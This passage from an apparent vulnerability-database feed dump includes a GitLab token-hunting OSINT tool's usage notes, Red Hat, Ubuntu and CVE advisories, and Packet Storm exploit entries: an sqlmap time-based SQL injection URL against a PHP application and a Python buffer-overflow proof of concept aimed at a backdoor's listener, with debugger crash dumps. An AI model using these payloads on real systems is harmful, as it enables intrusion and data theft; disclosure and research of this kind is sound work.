show this help message and exit \n -u URL, --url URL An optional argument to specify the base URL of your \n GitLab instance. If the argument is not supplied, its \n defaulted to 'https://gitlab.com' \n -m, --members Include group members personal projects and their \n related assets in the searchfor sensitive data. \n -s, --snippets Searches found projects for GitLab Snippets with \n sensitive data. \n -i, --issues Searches found projects for GitLab Issues and \n discussions/comments with sensitive data. \n -r, --mergerequests Searches found projects for GitLab Merge Requests and \n discussions/comments with sensitive data. \n -t, --timestamp Disables display of start/finish times and originating \n IP to the output \n -p PROXY, --proxy PROXY \n Proxies all requests using the provided URI matching \n the scheme: http(s)://user:[email\u00a0protected]:8000 \n -c CERT, --cert CERT Used in tandem with -p (--proxy), this switch provides \n a fully qualified path to a certificate to verify TLS \n connections. Provide a fully qualified path to the \n [dynamic](<https://www.kitploit.com/search/label/Dynamic> \"dynamic\" ) cert. Example: \n /Users/<username>/owasp_zap_root_ca.cer. \n -l LOGFILE, --logfile LOGFILE \n Will APPEND all output to specified file. \n \n required arguments: \n -g GROUP, --group GROUP \n ID or HTML encoded name of a GitLab group. This \n option, by itself, will display group projects and \n member names only. \n \n\n \n** Usage Examples ** \n\n\n` ./token-hunter.py -g 123456 `\n\nThe simplest use case is to return all the project URLs associated with a group by providing the group ID with the ` -g ` switch. You can find the group ID underneath the group name in the GitLab UI. No token searches are performed with this configuration. \n\n` ./token-hunter.py -g 123456 -m `\n\nFinds all projects for group 123456 as well as all of the personal projects for the group members. No token searches are performed with this configuration. \n\n` ./token-hunter.py -g 123456 -ms `\n\nFinds all projects for group 123456 as well as all of the personal projects for the group members. The ` -s ` switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data. \n\n` ./token-hunter.py -g 123456 -msir `\n\nFinds all projects for group 123456 as well as all of the personal projects for the group members. The ` -s ` switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data. The ` -i ` switch tells Token-Hunter to also search issues and discussions for each of the found projects for sensitive data. The ` -r ` switch tells Token-Hunter to also search merge requests and merge request discussions for each of the found projects. ** CAUTION: ** This configuration has the potential to pull a lot of data! \n\n` ./token-hunter.py -g 123456 -msit -u https://mygitlab-instance.com -p http://127.0.01:8080 -c /Users/hacker/owasp_zap_ca_cert.cer -l ./appended-output.txt `\n\nPerforms the same asset searches as the previous example against a self-hosted installation of GitLab running at ` https://mygitlab-instance.com ` . Requests and responses that the tool generates are proxied through ` http://127.0.01:8080 ` using the certificate defined at the fully qualified path ` /Users/hacker/owasp_zap_ca_cert.cer ` to decrypt the TLS traffic. Timestamps and origin IP are excluded from the output with the ` -t ` switch. Output is _ APPENDED _ to the ` ./appended-output.txt ` file with the ` -l ` switch. \n\n \n** Contributing ** \n\n\nContributions are welcome from the community. You can find and add to the issue list, submit merge requests, and add to the existing discussions. Token-Hunter is written in python 3. To make a code contribution: \n\n 1. [ Install python version 3 ](<https://realpython.com/installing-python/> \"Install python version 3\" )\n 2. Install pip version 3 to manage dependencies using the guide above. \n 3. Clone the repository \n 4. In the root directory, install dependencies with ` pip3 install -r ./requirements.txt `\n 5. [ Create a branch ](<https://docs.gitlab.com/ee/gitlab-basics/create-branch.html> \"Create a branch\" ) for the changes you'd like to make. \n 6. Modify or add test coverage in the existing ` ./test_* ` files, adding new files as needed. \n 7. Execute tests, written in [ pytest ](<http://doc.pytest.org/> \"pytest\" ) , with ` pytest -v ` to make sure they pass. \n 8. Create a merge requests for your changes and tag ` @gitlab-red-team ` to review and merge it. \n 9. Repeat! \n \n \n\n\n** [ Download Token-Hunter ](<https://github.com/codeEmitter/token-hunter> \"Download Token-Hunter\" ) **\n", "edition": 1, "modified": "2021-01-18T11:30:06", "published": "2021-01-18T11:30:06", "id": "KITPLOIT:7822299295723551865", "href": "http://www.kitploit.com/2021/01/token-hunter-collect-osint-for-gitlab.html", "title": "Token-Hunter - Collect OSINT For GitLab Groups And Members And Search The Group And Group Members' Snippets, Issues, And Issue Discussions For Sensitive Data That May Be Included In These Assets", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2021-01-18T16:39:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-28362"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n* jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n* jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n* jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin (CVE-2020-2307)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials IDs (CVE-2020-2309)\n\n* golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362)\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.6.12. See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHSA-2021:0037\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 4.6 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor.", "modified": "2021-01-18T19:54:54", "published": "2021-01-18T19:49:09", "id": "RHSA-2021:0038", "href": "https://access.redhat.com/errata/RHSA-2021:0038", "type": "redhat", "title": "(RHSA-2021:0038) Important: OpenShift Container Platform 4.6.12 packages and security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-18T16:40:41", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10130", "CVE-2019-10208", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (9.6.20).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\n* postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n* postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T21:08:50", "published": "2021-01-18T15:05:40", "id": "RHSA-2021:0167", "href": "https://access.redhat.com/errata/RHSA-2021:0167", "type": "redhat", "title": "(RHSA-2021:0167) Important: postgresql:9.6 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T16:38:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10130", "CVE-2019-10164", "CVE-2019-10208", "CVE-2020-14349", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (10.15).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: Stack-based buffer overflow via setting a password (CVE-2019-10164)\n\n* postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n* postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\n* postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n* postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T21:08:45", "published": "2021-01-18T15:02:33", "id": "RHSA-2021:0166", "href": "https://access.redhat.com/errata/RHSA-2021:0166", "type": "redhat", "title": "(RHSA-2021:0166) Important: postgresql:10 security update", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:41:47", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10130", "CVE-2019-10208", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (9.6.20).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\n* postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n* postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:46:33", "published": "2021-01-18T14:18:50", "id": "RHSA-2021:0164", "href": "https://access.redhat.com/errata/RHSA-2021:0164", "type": "redhat", "title": "(RHSA-2021:0164) Important: postgresql:9.6 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14349", "CVE-2020-14350", "CVE-2020-1720", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (12.5).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n* postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\n* postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:44:21", "published": "2021-01-18T14:18:11", "id": "RHSA-2021:0163", "href": "https://access.redhat.com/errata/RHSA-2021:0163", "type": "redhat", "title": "(RHSA-2021:0163) Important: postgresql:12 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:39:52", "bulletinFamily": "unix", "cvelist": ["CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced object-relational database management system (DBMS).\n\nThe following packages have been upgraded to a later upstream version: postgresql (10.15).\n\nSecurity Fix(es):\n\n* postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n* postgresql: Multiple features escape \"security restricted operation\" sandbox (CVE-2020-25695)\n\n* postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:36:11", "published": "2021-01-18T14:12:23", "id": "RHSA-2021:0161", "href": "https://access.redhat.com/errata/RHSA-2021:0161", "type": "redhat", "title": "(RHSA-2021:0161) Important: postgresql:10 security update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T10:40:43", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16044"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 78.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk (CVE-2020-16044)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-18T14:23:58", "published": "2021-01-18T14:11:42", "id": "RHSA-2021:0160", "href": "https://access.redhat.com/errata/RHSA-2021:0160", "type": "redhat", "title": "(RHSA-2021:0160) Critical: thunderbird security update", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-01-19T12:37:56", "description": "An issue was discovered in Open Design Alliance Drawings SDK before 2021.11. A NULL pointer dereference exists when rendering malformed .DXF and .DWG files. This can allow attackers to cause a crash, potentially enabling a denial of service attack (Crash, Exit, or Restart). This is issue 1 of 3.", "edition": 1, "cvss3": {}, "published": "2021-01-18T08:15:00", "title": "CVE-2021-25175", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-25175"], "modified": "2021-01-18T08:15:00", "cpe": [], "id": "CVE-2021-25175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25175", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "ubuntu": [{"lastseen": "2021-01-18T21:49:48", "bulletinFamily": "unix", "cvelist": ["CVE-2020-35654", "CVE-2020-35655", "CVE-2020-35653"], "description": "It was discovered that Pillow incorrectly handled certain PCX image files. \nIf a user or automated system were tricked into opening a specially-crafted \nPCX file, a remote attacker could possibly cause Pillow to crash, \nresulting in a denial of service. (CVE-2020-35653)\n\nIt was discovered that Pillow incorrectly handled certain Tiff image files. \nIf a user or automated system were tricked into opening a specially-crafted \nTiff file, a remote attacker could cause Pillow to crash, resulting in a \ndenial of service, or possibly execute arbitrary code. This issue only \naffected Ubuntu 20.04 LTS and Ubuntu 20.10. (CVE-2020-35654)\n\nIt was discovered that Pillow incorrectly handled certain SGI image files. \nIf a user or automated system were tricked into opening a specially-crafted \nSGI file, a remote attacker could possibly cause Pillow to crash, \nresulting in a denial of service. This issue only affected Ubuntu 18.04 \nLTS, Ubuntu 20.04 LTS, and Ubuntu 20.10. (CVE-2020-35655)", "edition": 1, "modified": "2021-01-18T00:00:00", "published": "2021-01-18T00:00:00", "id": "USN-4697-1", "href": "https://ubuntu.com/security/notices/USN-4697-1", "title": "Pillow vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-18T17:53:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5332", "CVE-2017-6011", "CVE-2017-5333", "CVE-2017-5208", "CVE-2017-6010", "CVE-2017-6009", "CVE-2017-5331"], "description": "Choongwoo Han discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to cause a denial of service \nor execute arbitrary code. (CVE-2017-5208)\n\nIt was discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to cause a denial of service \nor execute arbitrary code. (CVE-2017-5331, CVE-2017-5332, CVE-2017-5333)\n\nJerzy Kramarz discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to cause a crash or execute \narbitrary code. (CVE-2017-6009, CVE-2017-6010)\n\nJerzy Kramarz discovered that icoutils incorrectly handled certain files. \nAn attacker could possibly use this issue to expose sensitive information. \n(CVE-2017-6011)", "edition": 1, "modified": "2021-01-18T00:00:00", "published": "2021-01-18T00:00:00", "id": "USN-4695-1", "href": "https://ubuntu.com/security/notices/USN-4695-1", "title": "icoutils vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-01-18T16:22:48", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Life Insurance Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160980", "href": "https://packetstormsecurity.com/files/160980/Life-Insurance-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection \n# Date: 15/1/2021 \n# Exploit Author: Aitor Herrero \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html \n# Version: 1.0 \n# Tested on: Windows /linux / \n \nLogin in the application \n \nGo to clientStatus.php?client_id= \n \nsqlmap -u \"http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 \n<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160980/lims10-sql.txt"}, {"lastseen": "2021-01-18T16:24:37", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Latinus.b Remote Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160977", "href": "https://packetstormsecurity.com/files/160977/Backdoor.Win32.Latinus.b-Remote-Buffer-Overflow.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/9adffcc98cd658a7f9c5419480013f72.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Latinus.b \nVulnerability: Remote Buffer Overflow \nDescription: Malware listens on both TCP ports 11831 and 29559, by sending an HTTP OPTIONS request with about 8945 bytes we trigger buffer overflow and overwriting stack registers. \nType: PE32 \nMD5: 9adffcc98cd658a7f9c5419480013f72 \nVuln ID: MVID-2021-0029 \nDropped files: msHtml.exe \nASLR: False \nDEP: False \nSafe SEH: True \nDisclosure: 01/15/2021 \n \nMemory Dump: \nEAX : 41414141 \nEBX : 040C91C0 \nECX : 41414141 \nEDX : 040C7020 \nEBP : 0046B614 mshtml.0046B614 \nESP : 000A1494 \nESI : 00000014 \nEDI : 0046B610 mshtml.0046B610 \nEIP : 00401C78 mshtml.00401C78 \n \nThis dump file has an exception of interest stored in it. \nThe stored exception information can be accessed via .ecxr. \n(1534.17c0): Access violation - code c0000005 (first/second chance not available) \neax=41414141 ebx=04138948 ecx=41414141 edx=41414141 esi=00000014 edi=0046b610 \neip=00401c76 esp=000a1644 ebp=0046b614 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 \n*** WARNING: Unable to verify checksum for msHtml.exe \n*** ERROR: Module load completed but symbols could not be loaded for msHtml.exe \nmsHtml+0x1c76: \n00401c76 8902 mov dword ptr [edx],eax ds:002b:41414141=???????? \n \n \n0:000> !analyze -v \n******************************************************************************* \n* * \n* Exception Analysis * \n* * \n******************************************************************************* \n \nFailed calling InternetOpenUrl, GLE=12029 \n \nFAULTING_IP: \nmsHtml+1c76 \n00401c76 8902 mov dword ptr [edx],eax \n \nEXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) \nExceptionAddress: 00401c76 (msHtml+0x00001c76) \nExceptionCode: c0000005 (Access violation) \nExceptionFlags: 00000000 \nNumberParameters: 2 \nParameter[0]: 00000001 \nParameter[1]: 41414141 \nAttempt to write to address 41414141 \n \nPROCESS_NAME: msHtml.exe \n \nOVERLAPPED_MODULE: Address regions for 'comctl32_72d50000' and 'dataexchange.dll' overlap \n \nERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_PARAMETER1: 00000001 \n \nEXCEPTION_PARAMETER2: 41414141 \n \nWRITE_ADDRESS: 41414141 \n \nFOLLOWUP_IP: \nmsHtml+1c76 \n00401c76 8902 mov dword ptr [edx],eax \n \nMOD_LIST: <ANALYSIS/> \n \nNTGLOBALFLAG: 0 \n \nAPPLICATION_VERIFIER_FLAGS: 0 \n \nFAULTING_THREAD: 000017c0 \n \nBUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141 \n \nPRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141 \n \nDEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141 \n \nIP_ON_HEAP: 04144b5c \nThe fault address in not in any loaded module, please check your build's rebase \nlog at <releasedir>\\bin\\build_logs\\timebuild\\ntrebase.log for module which may \ncontain the address if it were loaded. \n \nFRAME_ONE_INVALID: 1 \n \nLAST_CONTROL_TRANSFER: from 04144b5c to 00401c76 \n \nSTACK_TEXT: \nWARNING: Stack unwind information not available. Following frames may be wrong. \n0046b614 04144b5c 027b87b0 027b9da4 027b9da4 msHtml+0x1c76 \n0046b618 027b87b0 027b9da4 027b9da4 00000000 0x4144b5c \n0046b61c 027b9da4 027b9da4 00000000 00000000 0x27b87b0 \n0046b620 027b9da4 00000000 00000000 00000000 0x27b9da4 \n0046b624 00000000 00000000 00000000 0019ff74 0x27b9da4 \n \n \nSTACK_COMMAND: ~0s; .ecxr ; kb \n \nSYMBOL_STACK_INDEX: 0 \n \nSYMBOL_NAME: msHtml+1c76 \n \nFOLLOWUP_NAME: MachineOwner \n \nMODULE_NAME: msHtml \n \nIMAGE_NAME: msHtml.exe \n \nDEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19 \n \nFAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_msHtml.exe!Unknown \n \nBUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141_msHtml+1c76 \n \n \nExploit/PoC: \nfrom socket import * \n \nMALWARE_HOST=\"x.x.x.x\" \nPORT=29559 \n \ndef doit(): \ns=socket(AF_INET, SOCK_STREAM) \ns.connect((MALWARE_HOST, PORT)) \nPAYLOAD=\"OPTIONS /\"+\"A\"*8945+ \" HTTP/1.1\\r\\nHost: \"+MALWARE_HOST+\"\\r\\n\\r\\n\" \ns.send(PAYLOAD) \ns.close() \nprint(\"Backdoor.Win32.Latinus.b / Remote Buffer Overflow \") \nprint(\"MD5: 9adffcc98cd658a7f9c5419480013f72\") \nprint(\"By Malvuln\") \n \nif __name__==\"__main__\": \ndoit() \n \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160977/MVID-2021-0029.txt"}, {"lastseen": "2021-01-18T16:20:09", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Whgrx Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160983", "href": "https://packetstormsecurity.com/files/160983/Backdoor.Win32.Whgrx-Remote-Stack-Buffer-Overflow.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/eb6fd418cd3b52132ffb029b52839edf.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Whgrx \nVulnerability: Remote Host Header Stack Buffer Overflow \nDescription: The specimen listens on datagram UDP port 65000, by sending a specially crafted HTTP PUT request and specifying a large string of characters for the HOST header we trigger the buffer overflow overwriting stack registers. Upon running the malware it may display a \"Cannot load shared library wsocx.dll\" message but still runs normally. The exploit payload specifies both 41414141 and 42424242 pattern with 42424242 overwriting SEH and ECX register, the 42424242 pattern was target the HTTP HOST header. \nType: PE32 \nMD5: eb6fd418cd3b52132ffb029b52839edf \nVuln ID: MVID-2021-0030 \nDropped files: \nASLR: False \nDEP: False \nSafe SEH: True \nDisclosure: 01/16/2021 \n \nMemory Dump: \nThis dump file has an exception of interest stored in it. \nThe stored exception information can be accessed via .ecxr. \n(1bb4.176c): Access violation - code c0000005 (first/second chance not available) \neax=00000000 ebx=00000000 ecx=42424242 edx=773e9d70 esi=042c1840 edi=042c1d04 \neip=773ce916 esp=042c1788 ebp=042c1828 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 \nntdll!ZwQueryInformationProcess+0x26: \n773ce916 c21400 ret 14h \n \n \n0:002> !analyze -v \n******************************************************************************* \n* * \n* Exception Analysis * \n* * \n******************************************************************************* \n \n*** WARNING: Unable to verify checksum for Backdoor.Win32.Whgrx.eb6fd418cd3b52132ffb029b52839edf.exe \n*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Whgrx.eb6fd418cd3b52132ffb029b52839edf.exe \n \nFAULTING_IP: \nBackdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+40a8 \n004040a8 8b4af8 mov ecx,dword ptr [edx-8] \n \nEXCEPTION_RECORD: 043bd8b4 -- (.exr 0x43bd8b4) \nExceptionAddress: 004040a8 (Backdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+0x000040a8) \nExceptionCode: c0000005 (Access violation) \nExceptionFlags: 00000000 \nNumberParameters: 2 \nParameter[0]: 00000000 \nParameter[1]: 4242423a \nAttempt to read from address 4242423a \n \nPROCESS_NAME: Backdoor.Win32.Whgrx.eb6fd418cd3b52132ffb029b52839edf.exe \n \nERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_PARAMETER1: 00000001 \n \nEXCEPTION_PARAMETER2: 042c0fe8 \n \nWRITE_ADDRESS: 042c0fe8 \n \nFOLLOWUP_IP: \nkernel32!BaseThreadInitThunk+0 \n76e38630 8bff mov edi,edi \n \nFAILED_INSTRUCTION_ADDRESS: \n+0 \n42424242 ?? ??? \n \nMOD_LIST: <ANALYSIS/> \n \nNTGLOBALFLAG: 0 \n \nAPPLICATION_VERIFIER_FLAGS: 0 \n \nCONTEXT: 043bd904 -- (.cxr 0x43bd904) \neax=043bfe84 ebx=00001fd3 ecx=00000000 edx=42424242 esi=026a2040 edi=00404018 \neip=004040a8 esp=043bdd64 ebp=043bfe88 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 \nBackdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+0x40a8: \n004040a8 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:4242423a=???????? \nResetting default scope \n \nADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] \n \nLAST_CONTROL_TRANSFER: from 42424242 to 004040a8 \n \nFAULTING_THREAD: ffffffff \n \nBUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_42424242 \n \nPRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_EXPLOITABLE_FILL_PATTERN_42424242 \n \nDEFAULT_BUCKET_ID: STACK_OVERFLOW_EXPLOITABLE_FILL_PATTERN_42424242 \n \nIP_ON_HEAP: 42424242 \nThe fault address in not in any loaded module, please check your build's rebase \nlog at <releasedir>\\bin\\build_logs\\timebuild\\ntrebase.log for module which may \ncontain the address if it were loaded. \n \nIP_IN_FREE_BLOCK: 42424242 \n \nFRAME_ONE_INVALID: 1 \n \nSTACK_TEXT: \n043bdd64 004040a8 backdoor_win32_whgrx+0x40a8 \n043bfe90 42424242 unknown!printable+0x0 \n043bff44 0041acef backdoor_win32_whgrx+0x1acef \n043bff74 00404042 